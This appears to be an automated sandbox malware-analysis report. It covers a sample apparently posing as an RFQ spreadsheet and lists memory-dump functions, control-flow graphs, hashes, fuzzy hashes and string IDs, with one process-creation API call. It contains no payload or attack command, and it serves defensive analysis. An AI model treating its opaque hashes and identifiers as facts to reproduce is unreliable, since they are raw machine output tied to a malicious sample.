                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b69ed34dc508632b231125ab243a3d0952e800edb56a58a697e4d30fdf5c3fad
                                                                                                                                                                                                • Instruction ID: 24906726d566bf488f40d2e9b2e5963ca161388f744abf2559fea54c6dbab79b
                                                                                                                                                                                                • Opcode Fuzzy Hash: b69ed34dc508632b231125ab243a3d0952e800edb56a58a697e4d30fdf5c3fad
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BE3F074D05628CBCB24EF29E98869CBBB2FF49300F4055E9D18CA6254DB315EE9CF49
                                                                                                                                                                                                Function 06817598 Relevance: 6.6, Instructions: 6573COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 3665 6817598-68175ca 3666 68175d1-68178fb 3665->3666 3667 68175cc 3665->3667 3700 6817903-681ebfa 3666->3700 3667->3666 4684 681ec05 3700->4684 4686 681ec0b call 68206d0 4684->4686 4687 681ec0b call 68206e0 4684->4687 4685 681ec11-681ec19 4686->4685 4687->4685
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 86457af113b94de6a41660ccac806b5936e71c6a7616cd62c7bb4f7be24f0d1a
                                                                                                                                                                                                • Instruction ID: 1f01009e56ac0a1b53745ae40fb09eee5df844d1b1f730bb92b2d134d853c3b5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 86457af113b94de6a41660ccac806b5936e71c6a7616cd62c7bb4f7be24f0d1a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE3F074D05628CBCB24EF29E98869CBBB2FF49300F4055E9D18CA6254DB315EE9CF49
                                                                                                                                                                                                Function 01727A78 Relevance: 5.5, Strings: 4, Instructions: 496COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 4896 1727a78-1727aae 4897 1727ab6-1727abc 4896->4897 5042 1727ab0 call 1727435 4896->5042 5043 1727ab0 call 172744b 4896->5043 5044 1727ab0 call 1727a78 4896->5044 5045 1727ab0 call 1727a68 4896->5045 4898 1727abe-1727ac2 4897->4898 4899 1727b0c-1727b10 4897->4899 4900 1727ad1-1727ad8 4898->4900 4901 1727ac4-1727ac9 4898->4901 4902 1727b12-1727b21 4899->4902 4903 1727b27-1727b3b 4899->4903 4904 1727bae-1727bc6 4900->4904 4905 1727ade-1727ae5 4900->4905 4901->4900 4906 1727b23-1727b25 4902->4906 4907 1727b4d-1727b57 4902->4907 4908 1727b43-1727b4a 4903->4908 4918 1727bc8 4904->4918 4919 1727bc9-1727beb 4904->4919 4905->4899 4909 1727ae7-1727aeb 4905->4909 4906->4908 4910 1727b61-1727b65 4907->4910 4911 1727b59-1727b5f 4907->4911 4912 1727afa-1727b01 4909->4912 4913 1727aed-1727af2 4909->4913 4915 1727b6d-1727ba7 4910->4915 4916 1727b67 4910->4916 4911->4915 4912->4904 4917 1727b07-1727b0a 4912->4917 4913->4912 4915->4904 4916->4915 4917->4908 4918->4919 4920 1727bf6-1727c16 4919->4920 4921 1727bed-1727bf3 4919->4921 4927 1727c18 4920->4927 4928 1727c1d-1727c24 4920->4928 4921->4920 4929 1727fac-1727fb5 4927->4929 4931 1727c26-1727c31 4928->4931 4932 1727c37-1727c4a 4931->4932 4933 1727fbd-1727fc9 4931->4933 4937 1727c60-1727c7b 4932->4937 4938 1727c4c-1727c5a 4932->4938 4939 1727fcb-1727fcd 4933->4939 4940 172803d-172803f 4933->4940 4952 1727c9f-1727ca2 4937->4952 4953 1727c7d-1727c83 4937->4953 4938->4937 4950 1727f34-1727f3b 4938->4950 4941 1728041-1728044 4939->4941 4942 1727fcf-1727fd1 4939->4942 4945 1728045-172804a 4940->4945 4941->4945 4944 1727fd3-1727fe5 4942->4944 4942->4945 4944->4940 4947 1728094 4945->4947 4948 172804c-172805b 4945->4948 4954 1728099-172809b 4947->4954 4948->4947 4970 172805d-1728063 4948->4970 4950->4929 4955 1727f3d-1727f3f 4950->4955 4956 1727ca8-1727cab 4952->4956 4957 1727dfc-1727e02 4952->4957 4958 1727c85 4953->4958 4959 1727c8c-1727c8f 4953->4959 4962 1727f41-1727f46 4955->4962 4963 1727f4e-1727f54 4955->4963 4956->4957 4967 1727cb1-1727cb7 4956->4967 4961 1727eee-1727ef1 4957->4961 4966 1727e08-1727e0d 4957->4966 4958->4957 4958->4959 4960 1727cc2-1727cc8 4958->4960 4958->4961 4959->4960 4964 1727c91-1727c94 4959->4964 4973 1727cca-1727ccc 4960->4973 4974 1727cce-1727cd0 4960->4974 4975 1727ef7-1727efd 4961->4975 4976 1727fb8 4961->4976 4962->4963 4963->4933 4971 1727f56-1727f5b 4963->4971 4968 1727c9a 4964->4968 4969 1727d2e-1727d34 4964->4969 4966->4961 4967->4957 4972 1727cbd 4967->4972 4968->4961 4969->4961 4981 1727d3a-1727d40 4969->4981 4977 1728067-1728073 4970->4977 4978 1728065 4970->4978 4979 1727fa0-1727fa3 4971->4979 4980 1727f5d-1727f62 4971->4980 4972->4961 4982 1727cda-1727ce3 4973->4982 4974->4982 4983 1727f22-1727f26 4975->4983 4984 1727eff-1727f07 4975->4984 4976->4933 4986 1728075-172808e 4977->4986 4978->4986 4979->4976 4985 1727fa5-1727faa 4979->4985 4980->4976 4987 1727f64 4980->4987 4988 1727d42-1727d44 4981->4988 4989 1727d46-1727d48 4981->4989 4991 1727cf6-1727d04 4982->4991 4992 1727ce5-1727cf0 4982->4992 4983->4950 4993 1727f28-1727f2e 4983->4993 4984->4933 4990 1727f0d-1727f1c 4984->4990 4985->4929 4985->4955 4986->4947 5012 1728090-1728092 4986->5012 4994 1727f6b-1727f70 4987->4994 4996 1727d52-1727d69 4988->4996 4989->4996 4990->4937 4990->4983 5007 1727d0d-1727d1e 4991->5007 4992->4961 4992->4991 4993->4931 4993->4950 4999 1727f92-1727f94 4994->4999 5000 1727f72-1727f74 4994->5000 5010 1727d94-1727dbb 4996->5010 5011 1727d6b-1727d84 4996->5011 4999->4976 5006 1727f96-1727f99 4999->5006 5003 1727f83-1727f89 5000->5003 5004 1727f76-1727f7b 5000->5004 5003->4933 5009 1727f8b-1727f90 5003->5009 5004->5003 5006->4979 5017 1727e12-1727e48 5007->5017 5018 1727d24-1727d29 5007->5018 5009->4999 5013 1727f66-1727f69 5009->5013 5010->4976 5023 1727dc1-1727dc4 5010->5023 5011->5017 5021 1727d8a-1727d8f 5011->5021 5012->4954 5013->4976 5013->4994 5024 1727e55-1727e5d 5017->5024 5025 1727e4a-1727e4e 5017->5025 5018->5017 5021->5017 5023->4976 5026 1727dca-1727df3 5023->5026 5024->4976 5029 1727e63-1727e68 5024->5029 5027 1727e50-1727e53 5025->5027 5028 1727e6d-1727e71 5025->5028 5026->5017 5041 1727df5-1727dfa 5026->5041 5027->5024 5027->5028 5030 1727e73-1727e79 5028->5030 5031 1727e90-1727e94 5028->5031 5029->4961 5030->5031 5035 1727e7b-1727e83 5030->5035 5033 1727e96-1727e9c 5031->5033 5034 1727e9e-1727ebd call 17280a0 5031->5034 5033->5034 5036 1727ec3-1727ec7 5033->5036 5034->5036 5035->4976 5037 1727e89-1727e8e 5035->5037 5036->4961 5039 1727ec9-1727ee5 5036->5039 5037->4961 5039->4961 5041->5017 5042->4897 5043->4897 5044->4897 5045->4897
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                                                                • API String ID: 0-879173519
                                                                                                                                                                                                • Opcode ID: 064b6e026396a83c398759720d4b39c37aa64a15736a3f84c3db18b380591f93
                                                                                                                                                                                                • Instruction ID: c56a547de66844aa2fa8780cde7dddc63539296906af288cefef948740485636
                                                                                                                                                                                                • Opcode Fuzzy Hash: 064b6e026396a83c398759720d4b39c37aa64a15736a3f84c3db18b380591f93
                                                                                                                                                                                                • Instruction Fuzzy Hash: BF127D31A00229CFDB19CF69C984AAEFBF6FF99310F148469E905AB261D731DD42CB51
                                                                                                                                                                                                Function 080ABF98 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 5166 80abf98-80abfbd 5167 80abfbf 5166->5167 5168 80abfc4-80abfe8 5166->5168 5167->5168 5169 80abfe9 5168->5169 5170 80abff0-80ac00c 5169->5170 5171 80ac00e 5170->5171 5172 80ac015-80ac016 5170->5172 5171->5169 5171->5172 5173 80ac10a-80ac13d call 80aa2d8 5171->5173 5174 80ac068-80ac070 5171->5174 5175 80ac16e-80ac171 5171->5175 5176 80ac0ae-80ac0c6 5171->5176 5177 80ac22d-80ac236 5171->5177 5178 80ac041-80ac052 5171->5178 5179 80ac145 5171->5179 5180 80ac1db-80ac20e call 80a5528 5171->5180 5181 80ac01b-80ac03f 5171->5181 5182 80ac23b-80ac244 5171->5182 5183 80ac0f2-80ac105 5171->5183 5184 80ac190-80ac1a8 5171->5184 5185 80ac216-80ac228 5171->5185 5172->5182 5173->5179 5187 80ac077-80ac082 5174->5187 5191 80ac17a-80ac18b 5175->5191 5200 80ac0c8-80ac0d7 5176->5200 5201 80ac0d9-80ac0e0 5176->5201 5177->5170 5204 80ac072-80ac074 5178->5204 5205 80ac054-80ac066 5178->5205 5189 80ac14e-80ac169 5179->5189 5180->5185 5181->5170 5183->5170 5202 80ac1aa-80ac1b9 5184->5202 5203 80ac1bb-80ac1c2 5184->5203 5185->5170 5196 80ac084-80ac093 5187->5196 5197 80ac095-80ac09c 5187->5197 5189->5170 5191->5170 5199 80ac0a3-80ac0a9 5196->5199 5197->5199 5199->5170 5207 80ac0e7-80ac0ed 5200->5207 5201->5207 5208 80ac1c9-80ac1d6 5202->5208 5203->5208 5204->5187 5205->5170 5207->5170 5208->5170
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: e\1$e\1$"*p$"*p
                                                                                                                                                                                                • API String ID: 0-1513742261
                                                                                                                                                                                                • Opcode ID: a105a8ba221034d3170973e214d113ffc7f9ecf4204e57b3cc0172f47d9687e4
                                                                                                                                                                                                • Instruction ID: c773cc49f5aef9f49bdaea2c732265503032c8f4517b19794d82d1d48182f2d2
                                                                                                                                                                                                • Opcode Fuzzy Hash: a105a8ba221034d3170973e214d113ffc7f9ecf4204e57b3cc0172f47d9687e4
                                                                                                                                                                                                • Instruction Fuzzy Hash: BA8100B4D052198FCB14CFE9D9946EEBBF2BF88301F24942AD416BB258DB345A02CF54
                                                                                                                                                                                                Function 0172B409 Relevance: 4.5, Strings: 3, Instructions: 732COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: TJcq$XX^q$XX^q
                                                                                                                                                                                                • API String ID: 0-3920166351
                                                                                                                                                                                                • Opcode ID: 167f11c7878394a70a253ee5e1cffc6470e665c4126a86276a485df368131677
                                                                                                                                                                                                • Instruction ID: 5faa004fbd27f2631d682fbc28381a38049d9fddbf405623ac2efebf268600ac
                                                                                                                                                                                                • Opcode Fuzzy Hash: 167f11c7878394a70a253ee5e1cffc6470e665c4126a86276a485df368131677
                                                                                                                                                                                                • Instruction Fuzzy Hash: 43529270A00224CFD764DF69C854B6DB7B2FF89310F1484AAE509AB3A1DB759D82CF51
                                                                                                                                                                                                Function 080A4510 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 5559 80a4510-80a452a 5560 80a452c 5559->5560 5561 80a4531-80a45dc 5559->5561 5560->5561 5571 80a45df 5561->5571 5572 80a45e6-80a4602 5571->5572 5573 80a460b-80a460c 5572->5573 5574 80a4604 5572->5574 5575 80a477b-80a4781 5573->5575 5578 80a4611-80a462b 5573->5578 5574->5571 5574->5575 5576 80a462d-80a46bd 5574->5576 5577 80a46f0-80a4731 call 80a5cf0 5574->5577 5574->5578 5579 80a4744-80a4748 5574->5579 5596 80a46bf-80a46ce 5576->5596 5597 80a46d0-80a46d7 5576->5597 5593 80a4737-80a473f 5577->5593 5578->5572 5580 80a474a-80a4759 5579->5580 5581 80a475b-80a4762 5579->5581 5582 80a4769-80a4776 5580->5582 5581->5582 5582->5572 5593->5572 5598 80a46de-80a46eb 5596->5598 5597->5598 5598->5572
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 6f$6f$$^q
                                                                                                                                                                                                • API String ID: 0-2554587936
                                                                                                                                                                                                • Opcode ID: 78eab8962686bc6aa2f63e981d730c5833e982ac3201c571b723ba00bdebdf7e
                                                                                                                                                                                                • Instruction ID: 5b588eb0a5d02a39242165462024891b4a20e54e6efeacb719c24a345ea23e11
                                                                                                                                                                                                • Opcode Fuzzy Hash: 78eab8962686bc6aa2f63e981d730c5833e982ac3201c571b723ba00bdebdf7e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3471D2B8E01208DFDB58DFA9D58459EBBB3FF88301F20952AD50AAB354DB349981CF51
                                                                                                                                                                                                Function 080B5540 Relevance: 3.7, Instructions: 3668COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 5600 80b5540-80b5542 5601 80b558b-80b55e6 5600->5601 5602 80b5544-80b558a 5600->5602 5603 80b5629-80b5656 5601->5603 5604 80b55e8-80b5628 5601->5604 5602->5601 5605 80b5659-80b5683 5603->5605 5606 80b5658 5603->5606 5604->5603 5607 80b568a-80b56e1 5605->5607 5608 80b5685 5605->5608 5606->5605 5612 80b56e7-80b57f3 5607->5612 5613 80b57f4-80b57fc 5607->5613 5608->5607 5612->5613 5614 80b57fe-80b580b 5613->5614 5615 80b580d-80b5821 call 80b3998 5613->5615 5617 80b586c-80b728c call 80b3af8 5614->5617 5623 80b5823-80b5844 5615->5623 5624 80b5846-80b5866 5615->5624 5855 80b728e 5617->5855 5856 80b7293-80b731d 5617->5856 5623->5617 5624->5617 5855->5856 6161 80b731f call 80ba6df 5856->6161 6162 80b731f call 80be86d 5856->6162 6163 80b731f call 80ba6e0 5856->6163 5863 80b7325-80b760c 5888 80b773c-80b782b 5863->5888 5889 80b7612-80b7737 5863->5889 5906 80b782c-80b92ad 5888->5906 5889->5906 6127 80b92af 5906->6127 6128 80b92b4-80b92e8 5906->6128 6127->6128 6164 80b92ee call 1725b70 6128->6164 6165 80b92ee call 1725b30 6128->6165 6129 80b92f3-80b943e 6139 80b9440 6129->6139 6140 80b9445-80b944a 6129->6140 6139->6140 6141 80b9469-80b9586 6140->6141 6142 80b944c-80b9464 6140->6142 6156 80b9588 6141->6156 6157 80b958d-80b95d4 6141->6157 6143 80b95da-80b961e 6142->6143 6156->6157 6157->6143 6161->5863 6162->5863 6163->5863 6164->6129 6165->6129
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3b00fa9fcd338afcc77fd7b5a977f895cf3fed5b280eb1ad415f96839bbec020
                                                                                                                                                                                                • Instruction ID: a1c3511fd35ccfcf15f591b798e0ad056cf34151cbd7f231005e310fa776e127
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b00fa9fcd338afcc77fd7b5a977f895cf3fed5b280eb1ad415f96839bbec020
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B83E070915628CBDB64EF69ED88A9CBBB1FF46300F4065E9C088A6251DF345EE8CF45
                                                                                                                                                                                                Function 01727435 Relevance: 3.0, Strings: 2, Instructions: 487COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q$Hbq
                                                                                                                                                                                                • API String ID: 0-662517225
                                                                                                                                                                                                • Opcode ID: 844ba05c27705f4624b1bdc423e01aef3b3aa01a2a38f0b514def505c4c2d2d8
                                                                                                                                                                                                • Instruction ID: 38a6477e58ae58cd47fdce6cfe8aecdde194252ac592310e7db91ee568756791
                                                                                                                                                                                                • Opcode Fuzzy Hash: 844ba05c27705f4624b1bdc423e01aef3b3aa01a2a38f0b514def505c4c2d2d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 41029F70A002298FDB19DF69C954BAEBBF2FF98300F148569E509DB395DB349D42CB90
                                                                                                                                                                                                Function 0682EBBC Relevance: 2.8, Strings: 2, Instructions: 288COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Te^q$Te^q
                                                                                                                                                                                                • API String ID: 0-3743469327
                                                                                                                                                                                                • Opcode ID: 7ff078222945288f7c58c2ec26b59e764338c2b22af5714cc5901c726739944f
                                                                                                                                                                                                • Instruction ID: f6bd415e8e92b0a7b86e37d4f05b0cba83e1598189152761b4a890bc7dced322
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ff078222945288f7c58c2ec26b59e764338c2b22af5714cc5901c726739944f
                                                                                                                                                                                                • Instruction Fuzzy Hash: EAC15874E0421A9FDB44CFAAC884ADEFBB2FF89310F24856AD419BB254D7309941CF65
                                                                                                                                                                                                Function 06820E50 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Xbq$$^q
                                                                                                                                                                                                • API String ID: 0-1593437937
                                                                                                                                                                                                • Opcode ID: 97ccb2e69bffa1a46fa2eedf18b4aa1813c1a70be2f31f37fe99d4d5f52d0682
                                                                                                                                                                                                • Instruction ID: 03a0de462006dbe1a9e0ac6d37527bcca27ce0828908c66e2fb8db500a3fa085
                                                                                                                                                                                                • Opcode Fuzzy Hash: 97ccb2e69bffa1a46fa2eedf18b4aa1813c1a70be2f31f37fe99d4d5f52d0682
                                                                                                                                                                                                • Instruction Fuzzy Hash: AC819674F002198FDB589F78885427F7BB7BFC8B15B15852DE546E7298CE3488828792
                                                                                                                                                                                                Function 080A44FF Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 6f$$^q
                                                                                                                                                                                                • API String ID: 0-857817941
                                                                                                                                                                                                • Opcode ID: f0c3fd339e68f3e89a6d9ac19b5b7f01570261cb6388b9d4d8ae701b1ceb26f0
                                                                                                                                                                                                • Instruction ID: d7d13abc9ec5834fa5cc500c02c35c062918e0ca895b1c386692cebd83a79991
                                                                                                                                                                                                • Opcode Fuzzy Hash: f0c3fd339e68f3e89a6d9ac19b5b7f01570261cb6388b9d4d8ae701b1ceb26f0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6171D378E01208DFDB48DFA9D48459EBBB3FF89301F20952AD90AAB355DB349942CF51
                                                                                                                                                                                                Function 080ABA18 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 080ABB83
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateProcessUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2217836671-0
                                                                                                                                                                                                • Opcode ID: 1e7124ff6db85e5878f847340a4acf838b49b5141a151dc12c1ad4ee60f6566a
                                                                                                                                                                                                • Instruction ID: 161ec43c7b86639aa5fd94fb67080c9713e073e882c947e9637a9f6d7edd0ecb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e7124ff6db85e5878f847340a4acf838b49b5141a151dc12c1ad4ee60f6566a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7851F871D0021ADFDB64CF99C940BDDBBB6BF48310F0484AAE519B7250DB75AA85CF90
                                                                                                                                                                                                Function 0819FAA7 Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: kQD
                                                                                                                                                                                                • API String ID: 0-3066535408
                                                                                                                                                                                                • Opcode ID: 8ad2b8e57d8d537d15c122a63fda41271bd0d905d98404edf116c7057f859a24
                                                                                                                                                                                                • Instruction ID: 0a08d5701b121923095e7551e01c9e4a3303360eaf3c2d260a24487b482491dd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad2b8e57d8d537d15c122a63fda41271bd0d905d98404edf116c7057f859a24
                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D15B74D05209EFCB08CFA9C4908AEFBB2FF49341B15D56AD445AB324DB35A942CF91
                                                                                                                                                                                                Function 080BA6E0 Relevance: 1.5, Instructions: 1503COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b38835ce4f8d03acc02ff9697ab61378fa68ef5e212e2ff83581762b96cee56c
                                                                                                                                                                                                • Instruction ID: ea119bb2b8bc8ae60c28de1496ff44a7361ecec446e0ff9fcd9c37359be230d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: b38835ce4f8d03acc02ff9697ab61378fa68ef5e212e2ff83581762b96cee56c
                                                                                                                                                                                                • Instruction Fuzzy Hash: A6E2E070D05628CBDB24EF69ED886ADBBB1FB49300F5054E9D088A7254DB305EE8CF59
                                                                                                                                                                                                Function 080BA6DF Relevance: 1.4, Instructions: 1409COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 9ef408b5a359882e6fb2faf77f2a656c5b09bdf9ae6686d6cde280959d7e141a
                                                                                                                                                                                                • Instruction ID: 8b9f93809cacea5633e6996839eb0ae95141c221dc60e5e1f383cf6800066a35
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ef408b5a359882e6fb2faf77f2a656c5b09bdf9ae6686d6cde280959d7e141a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FE2D070D04628CBDB24EF69ED886ADBBB1FB49300F5054E9D088A7255DB305EE8CF59
                                                                                                                                                                                                Function 0682F471 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: >NG
